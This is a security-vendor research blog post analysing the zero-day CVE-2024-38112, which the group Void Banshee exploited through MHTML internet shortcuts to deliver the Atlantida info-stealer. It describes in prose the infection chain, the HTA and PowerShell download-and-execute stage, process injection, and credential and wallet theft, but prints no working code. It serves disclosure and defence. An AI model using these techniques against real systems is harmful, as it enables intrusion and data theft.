Business
Improve your risk posture with attack surface management
Security that enables business outcomes
Gain visibility and meet business needs with security
Connect with confidence from anywhere, on any device
Secure users and key operations throughout your environment
Move faster than your adversaries with powerful purpose-built XDR, attack surface risk management, and zero trust capabilities
Maximize effectiveness with proactive risk reduction and managed services
Understand your attack surface, assess your risk in real time, and adjust policies across network, workloads, and devices from a single console
Drive business value with measurable cybersecurity outcomes
See more, act faster
Evolve your security to mitigate threats quickly and effectively
Ensure code runs only as intended
Gain visibility and control with security designed for cloud environments
Protect patient data, devices, and networks while meeting regulations
Protecting your factory environments – from traditional devices to state-of-the-art infrastructures
ICS/OT Security for the oil and gas utility industry
ICS/OT Security for the electric utility
Stop threats with easy-to-use solutions designed for your growing business
Bridge threat protection and cyber risk management
Your generative AI cybersecurity assistant
Stop breaches before they happen
Stop adversaries faster with a broader perspective and better context to hunt, detect, investigate, and respond to threats from a single platform
The most trusted cloud security platform for developers, security teams, and businesses
Cloud asset discovery, vulnerability prioritization, Cloud Security Posture Management, and Attack Surface Management all in one
Extend visibility to the cloud and streamline SOC investigations
Secure your data center, cloud, and containers without compromising performance by leveraging a cloud security platform with CNAPP capabilities
Simplify security for your cloud-native applications with advanced container image scanning, policy-based admission control, and container runtime protection
Protect application workflow and cloud storage against advanced threats
Defend the endpoint through every stage of an attack
Stop adversaries faster with a broader perspective and better context to hunt, detect, investigate, and respond to threats from a single platform
Optimized prevention, detection, and response for endpoints, servers, and cloud workloads
On-premises and cloud protection against malware, malicious applications, and other mobile threats
Expand the power of XDR with network detection and response
Stop adversaries faster with a broader perspective and better context to hunt, detect, investigate, and respond to threats from a single platform
Protect against known, unknown, and undisclosed vulnerabilities in your network
Detect and respond to targeted attacks moving inbound, outbound, and laterally
Redefine trust and secure digital transformation with continuous risk assessments
Stop phishing, malware, ransomware, fraud, and targeted attacks from infiltrating your enterprise
Stop phishing, ransomware, and targeted attacks on any email service including Microsoft 365 and Google Workspace
Learn about solutions for ICS / OT security.
Stop adversaries faster with a broader perspective and better context to hunt, detect, investigate, and respond to threats from a single platform
See threats coming from miles away
End-to-end identity security from identity posture management to detection and response
Prevent, detect, respond and protect without compromising data sovereignty
Augment security teams with 24/7/365 managed detection, response, and support
Augment threat detection with expertly managed detection and response (MDR) for email, endpoints, servers, cloud workloads, and networks
Our trusted experts are on call whether you're experiencing a breach or looking to proactively improve your IR plans
Stop breaches with the best response and detection technology on the market and reduce clients’ downtime and claim costs
Grow your business and protect your customers with the best-in-class complete, multilayered security
Stand out to customers with competency endorsements that showcase your expertise
Deliver modern security operations services with our industry-leading XDR
Partner with a leading expert in cybersecurity, leverage proven solutions designed for MSPs
We work with the best to help you optimize performance and value
Discover resources designed to accelerate your business’s growth and enhance your capabilities as a Trend Micro partner
Accelerate your learning with Trend Campus, an easy-to-use education platform that offers personalized technical guidance
Access collaborative services designed to help you showcase the value of Trend Vision One™ and grow your business
Locate a partner from whom you can purchase Trend Micro solutions
See how Trend outperforms the competition
Crowdstrike provides effective cybersecurity through its cloud-native platform, but its pricing may stretch budgets, especially for organizations seeking cost-effective scalability through a true single platform
Microsoft offers a foundational layer of protection, yet it often requires supplemental solutions to fully address customers' security problems
Palo Alto Networks delivers advanced cybersecurity solutions, but navigating its comprehensive suite can be complex and unlocking all capabilities requires significant investment
Trend Detects NVIDIA AI Toolkit Vulnerability
Learn more >
The Illusion of Choice: Uncovering Electoral Deceptions in the Age of AI
Read report >
Shaping the Future of Attack Surface Management
See how >
2024 Cyber Risk Report
Get the latest insights >
Content has been added to your Folio
Exploits & Vulnerabilities
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.
By: Peter Girnus, Aliakbar Zahravi Read time: ( words)
Save to Folio
Report Highlights:
Trend Micro Zero Day Initiative (ZDI) discovered the MHTML remote code execution (RCE) vulnerability CVE-2024-38112. We immediately alerted Microsoft of this vulnerability being used in–the-wild as ZDI-CAN-24433. CVE-2024-38112 was used as part of an attack chain by the advanced persistent threat (APT) group Void Banshee, which targets North American, European, and Southeast Asian regions for information theft and financial gain. The final payload of this zero-day attack chain is the Atlantida stealer, which was first discovered in January 2024. Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains.
In mid-May 2024, we tracked this updated Void Banshee campaign using internal and external telemetry. The Void Banshee group used similar tools, tactics, and procedures (TTPs) that involved abusing internet shortcuts (.URL) and Microsoft protocol handlers and URI schemes, including the MHTML (MIME encapsulation of aggregate HTML documents) protocol which was able to access Windows system-disabled Internet Explorer.
In the attack chain shown in Figure 1, the threat actor leveraged CVE-2024-38112 to execute malicious code by abusing the MHTML protocol handler and x-usc directives through internet shortcut (URL) files. Using this technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance on Windows machines. This MHTML code execution vulnerability was used to infect users and organizations with Atlantida malware.
Trend provides protection to users from threat actors that exploit CVE-2024-38112 via the security solutions that can be found at end of this blog entry.
Internet Explorer (IE) has officially ended support on June 15, 2022. Additionally, IE has been officially disabled through later versions of Windows 10, including all versions of Windows 11. Disabled, however, does not mean IE was removed from the system. The remnants of IE exist on the modern Windows system, though it is not accessible to the average user (Figure 2).
If users attempt to execute the IE executable (iexplore.exe), instead its replacement, Microsoft Edge, opens. For users and organizations that need to access sites and workloads through Internet Explorer, Microsoft has provided IE mode for Microsoft Edge (Figure 3). IE mode for Edge contains some IE-specific functionality, but operates inside the Microsoft Edge sandbox, which in theory provides enhanced security for the end user.
In this campaign, the ZDI threat hunting team discovered and analyzed samples exploiting CVE-2024-38112, which we disclosed to Microsoft. These samples could run and execute files and websites through the disabled IE process by exploiting CVE-2024-38112 through MSHTML. By using specially crafted.URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application (HTA) files directly through the disabled IE process. This method of exploitation is similar to CVE-2021-40444, another MSHTML vulnerability that was used in zero-day attacks. This method of using the disabled IE process as a proxy to access sites and scripts is especially alarming, as IE has historically been a vast attack surface but now receives no further updates or security fixes.
This vulnerability was patched as part of the July 2024 Patch Tuesday. As of this patch cycle, Microsoft has unregistered the MHTML handler from Internet Explorer (Figure 4).
This means that MHTML is no longer usable inside of internet shortcut files.
Void Banshee used zip archives containing copies of books in PDF format, along with malicious files disguised as PDFs in spearphishing links (T1566.002), on online libraries, cloud sharing sites, Discord, and a slew of compromised websites.
Some PDF lures we uncovered during our analysis of the Void Banshee campaign include textbooks and reference material such as Clinical Anatomy, which suggests the campaign is targeting highly skilled professionals and students who often use reference materials and places where digital copies of books are collected (Figure 5). In the case of exploiting CVE-2024-38112, Void Banshee changed the default icon of an internet shortcut file to that of a PDF file to entice the victim into executing it.
The zero-day attack begins when the victim opens a URL shortcut file designed to exploit CVE-2024-38112. One of the samples we uncovered, "Books_A0UJKO.pdf.url", is designed to look like a PDF copy of a book (Figure 6). The URL shortcut uses the MHTML protocol handler and the x-usc! directive through the internet shortcut’s URL parameter. This logic string is similar to the exploit logic of CVE-2021-40444 (Microsoft Office Remote Code Execution Vulnerability), highlighting the continued misuse of Windows protocol handlers.
In this attack, CVE-2024-38112 was used as a zero-day to redirect a victim by opening and using the system-disabled IE to a compromised website which hosted a malicious HTML Application (HTA), as shown in Figure 7.
In the URL parameter of the internet shortcut file, we can see that Void Banshee specifically crafted this URL string using the MHTML protocol handler along with the x-usc! directive. This logic string opens the URL target in the native Internet Explorer through the iexplore.exe process.
As mentioned above, the internet shortcut file that exploits CVE-2024-38112 points to an attacker-controlled domain where an HTML file downloads the HTA stage of the infection chain (Figure 8). Using this HTML file, the attacker can also control the window view size of the website through IE. This is used by the threat actor to hide browser information and to mask the downloading of the next stage of the infection chain from the victim. Void Banshee specifically crafted this HTML file using window size elements to control the window size of IE.
Once this URL is contacted via IE, it attempts to open the malicious HTA file, prompting the user to open or save the HTML application (Figure 9). This behavior is unique to IE in that HTA files are opened by default, whereas modern browsers like Microsoft Edge or Chrome do not have the default open action.
The attacker adds 26 spaces to the malicious HTA file extension in “Books_A0UJKO.pdf.hta” to push the extension off the screen (Figure 10). The ellipses highlight that the filename contains additional content however, it is not clickable or expandable. To an unsuspecting user, it appears as if this is merely a PDF file.
The HTA file contains a Visual Basic Script (VBScript) that decrypts XOR encrypted content with key 4 and executes the content using PowerShell (Figure 11). This script uses PowerShell to download an additional script hosted on a compromised web server and executes the command using the PowerShell irm (Invoke-RestMethod) alias and iex (Invoke-Expression) alias commands. Finally, the script creates a new process for the downloaded script using the Win32_Process WMI class.
Initially, the script defines the DllImport attributes to import two functions:
It then uses the Add-Type cmdlet to add the type defined in $crop213 to the current PowerShell session, under the namespace crumble542543 with the name culture6546.
Next, the script retrieves the handle of the console window using the GetConsoleWindow method and stores it in $danger5646. It then calls ShowWindow with the window handle and the parameter 0, which hides the console window. This technique is often employed in malware to run without displaying any user interface.
The script proceeds to create a new System.Net.WebClient object, which is used to download data from a malicious server. This downloaded data is subsequently loaded as a .NET assembly using the System.Reflection.Assembly’s Load method. Finally, the script invokes the entry point of the downloaded assembly, effectively executing the code contained within it.
LoadToBadXml is a .NET Trojan loader that is obfuscated using Eziriz .NET Reactor. As shown in Figure 13, it decrypts XOR-encrypted payloads using a byte array key (3, 2, 2).
It then injects them into C:WindowsMicrosoft.NETFrameworkv4.0.30319RegAsm.exe. The malware employs a common process injection technique, which involves the following steps:
LoadToBadXml is a modified version of the shellcode injector from Program.cs of the open-source project Donut Loader (Figure 14).
Donut is an opensource position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files, and dotNET assemblies. In this attack, Donut is used to decrypt and execute the Atlantida stealer inside RegAsm.exe process memory.
The final payload delivered in this attack is the Atlantida stealer, an info-stealer malware with extensive capabilities. Overall, the malware is built from open-source stealers NecroStealer and PredatorTheStealer, incorporating many of the same functions and structures found in these programs. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, various cryptocurrency wallets, and web browsers. This malware focuses on extracting stored sensitive and potentially valuable data, such as passwords and cookies, and it can also collect files with specific extensions from the infected system’s desktop. Moreover, the malware captures the victim’s screen and gathers comprehensive system information. The stolen data is then compressed into a ZIP file and transmitted to the attacker via TCP.Upon execution, the malware initializes the ZIP file, sets up necessary structures, and manages the process of writing files to the archive. It then retrieves the "APPDATA" and "DESKTOP" paths and stores them in a global variable. This variable is later used throughout the code to access these locations, utilizing the SHGetFolderPathA Windows API with CSIDL values "0x1A" and "0x00," respectively.
Afterward, it takes a screenshot, saves it as "screenshot.jpeg," and adds it to the ZIP. The compression method is similar to the one used in zip.cpp for Necro Stealer and PredatorTheStealer.
To retrieve an infected system’s geolocation information, such as IP address, country, and zip code, the malware contacts its command-and-control (C&C) server over port 6666 instead of using public services. Figure 15 shows an example of a C&C response:
The malware then stores this in the “Geo Information.txt” and appends it to the ZIP archive (Figure 16).
Next, the malware starts to collect system information such as RAM, GPU, CPU, and screen resolution and stores it in “User Information.txt”, subsequently appending this file to a zip archive held in memory (Figure 17). Furthermore, the malware harvests credentials and sensitive files from various applications. For FileZilla, the malware searches for the XML file located at C:Users<USERNAME>AppDataRoamingFileZillarecentservers.xml, which contains information about recently connected servers. This XML file typically includes data such as the server’s hostname, port number, username, and connection type. Additionally, the malware attempts to steal data that includes:
The Atlantida stealer has the ability to steal information from cryptocurrency-related Google Chrome and Microsoft Edge extensions. For each extension, an “Extension ID” is given. The malware uses this information to harvest data stored within.
This is the extension path:
The following is a browser extension list of cryptocurrency wallets:
The malware compresses all the collected data into a ZIP file and exfiltrates it to the attacker’s C&C server over TCP port 6655.
In this campaign, we have observed that even though users may no longer be able to access IE, threat actors can still exploit lingering Windows relics like IE on their machine to infect users and organizations with ransomware, backdoors, or as a proxy to execute other strains of malware. The ability of APT groups like Void Banshee to exploit disabled services such as IE poses a significant threat to organizations worldwide. Since services such as IE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows users. Furthermore, the ability of threat actors to access unsupported and disabled system services to circumvent modern web sandboxes such as IE mode for Microsoft Edge highlights a significant industry concern.
To make software more secure and protect customers from zero-day attacks, Trend ZDI works with security researchers and vendors to patch and responsibly disclose software vulnerabilities before APT groups can deploy them in attacks. The ZDI Threat Hunting team also proactively hunts for zero-day attacks in the wild to safeguard the industry. The ZDI program is the largest vendor agnostic bug bounty program in the world while disclosing vulnerabilities to vendors at 2.5x the rate.
Organizations can help protect themselves from these kinds of attacks with Trend Vision One™️, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. This is all backed by advanced threat research, intelligence, and AI, which helps reduce the time taken to detect, respond, and remediate issues. Ultimately, Vision One can help improve the overall security posture and effectiveness of an organization, including against zero-day attacks.
When faced with uncertain intrusions, behaviors, and routines, organizations should assume that their system is already compromised or breached and work to immediately isolate affected data or toolchains. With a broader perspective and rapid response, organizations can address breaches and protect its remaining systems, especially with technologies such as Trend Micro Endpoint Security and Trend Micro Network Security, as well as comprehensive security solutions such as Trend Micro™ XDR, which can detect, scan, and block malicious content across the modern threat landscape.
The following protections exist to detect and protect Trend customers against the zero-day CVE-2024-38112 (ZDI-CAN-24433) and Atlantida malware exfiltration attempts.
Download the full list of IOCs here.
The Zero Day Initiative would like to thank the following Trenders for their contributions in ensuring that Trend Micro customers were protected from this zero-day attack pre-patching:
Scott Graham, Mohamad Mokbel, Abdelrahman Esmail, Simon Dulude, Senthil Nathan Sankar, Amit Kumar, and a special thanks to the content writers and marketing teams for helping with this research.
Peter Girnus
Sr. Threat Researcher
Aliakbar Zahravi
Staff Researcher
Experience our unified platform for free
Country Headquarters
Trend Micro – United States (US)
225 East John Carpenter Freeway
Suite 1500
Irving, Texas 75062
Phone: +1 (817) 569-8900
Select a country / region
Privacy | Legal | Accessibility | Site map
Copyright ©2024 Trend Micro Incorporated. All rights reserved
Copyright ©2024 Trend Micro Incorporated. All rights reserved
